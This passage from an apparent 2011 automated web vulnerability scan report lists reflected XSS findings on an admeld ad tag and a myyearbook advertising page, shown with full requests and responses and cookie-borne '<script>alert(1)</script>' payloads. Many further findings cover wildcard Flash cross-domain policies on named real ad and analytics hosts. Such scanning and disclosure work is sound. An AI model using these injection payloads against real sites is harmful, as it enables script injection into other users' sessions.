GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514a3487"><script>alert(1)</script>ec6aea0cfca; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1878
Content-Type: text/html
Date: Sat, 23 Jul 2011 13:48:55 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514a3487"><script>alert(1)</script>ec6aea0cfca&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the MYB_TARGET cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6cc0</script><script>alert(1)</script>8e6a735c675 was submitted in the MYB_TARGET cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=d6cc0</script><script>alert(1)</script>8e6a735c675; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
Content-Length: 827
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.20.154

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8250125438595222");
GS_googleEnableAllServices();
var u_id="d6cc0</script><script>alert(1)</script>8e6a735c675";var gen="";var age="";var zip="";</script>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 41 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a1.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:24:38 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Thu, 21 Jul 2011 16:13:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 21 Jul 2011 19:28:47 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.4. http://analytics.spongecell.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.spongecell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.spongecell.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Thu, 21 Jul 2011 19:30:49 GMT
Content-Type: text/xml
Content-Length: 325
Last-Modified: Tue, 22 Mar 2011 01:45:24 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 21 Jul 2011 19:30:48 GMT
Cache-Control: no-cache
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://api.chartbeat.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.chartbeat.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:57 GMT
Content-Type: text/xml
Content-Length: 342
Last-Modified: Tue, 12 Jul 2011 19:40:15 GMT
Connection: close
Access-Control-Allow-Origin: *
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.6. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 20 Aug 2011 19:22:11 GMT
X-FB-Server: 10.42.14.49
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.7. http://cdn.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:31:27 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n5 ( iad-agg-n25), ht-d iad-agg-n25.panthercdn.com
ETag: "2d5a54d440cc1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 12:05:37 GMT
Age: 372350
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.8. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.9. http://contextlinks.netseer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextlinks.netseer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextlinks.netseer.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"313-1280025612000"
Last-Modified: Sun, 25 Jul 2010 02:40:12 GMT
Content-Type: application/xml
Content-Length: 313
Date: Thu, 21 Jul 2011 19:23:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 20 Jul 2011 22:25:07 GMT
Expires: Tue, 12 Jul 2011 22:21:58 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79464
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.11. http://gadgets.justanswer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgets.justanswer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gadgets.justanswer.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "717e2d35514ddef87be36dea79d4e6e7:1280183599"
Last-Modified: Mon, 26 Jul 2010 22:33:19 GMT
Accept-Ranges: bytes
Content-Length: 485
Content-Type: application/xml
Date: Thu, 21 Jul 2011 19:23:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*" secure="true" to-ports="*"/>
...[SNIP]...

4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www403
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.13. http://ic.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ic.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:31:46 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:08 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://l.5min.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Nov 2010 13:43:12 GMT
Accept-Ranges: bytes
ETag: "f5e7e9e4937acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m02.ehost.aol.com
Date: Thu, 21 Jul 2011 19:24:25 GMT
Connection: keep-alive
Content-Length: 315

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.16. http://m.webtrends.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:73f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:35 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://metrics.apple.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:06 GMT
Server: Omniture DC/2.0.0
xserver: www603
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.18. http://pfiles.5min.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pfiles.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pfiles.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:50 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n34.panthercdn.com
ETag: "6c38932b2bf0ca1:0"
Cache-Control: max-age=31536000
Expires: Wed, 20 Jun 2012 19:38:27 GMT
Age: 2591063
Content-Length: 310
Content-Type: text/xml
Last-Modified: Mon, 10 May 2010 10:25:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" />
...[SNIP]...

4.19. http://pixel.everesttech.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "5e0288-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=990034
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.20. http://pixel1350.everesttech.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel1350.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel1350.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:02 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "37f8c15-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=996026
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.21. http://pshared.5min.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pshared.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pshared.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:49 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n27.panthercdn.com
ETag: "031c49ef11acc1:0"
Cache-Control: max-age=604800
Expires: Wed, 27 Jul 2011 10:25:24 GMT
Age: 118645
Content-Length: 315
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:37:14 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.22. http://puma.vizu.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:47 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n29.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 330363
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.23. http://rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.24. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.25. http://syn.5min.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syn.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: syn.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:39:52 GMT
Accept-Ranges: bytes
ETag: "014f1fcf11acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:22:47 GMT
Connection: keep-alive
Content-Length: 310

<?xml version="1.0" encoding="UTF-8"?>
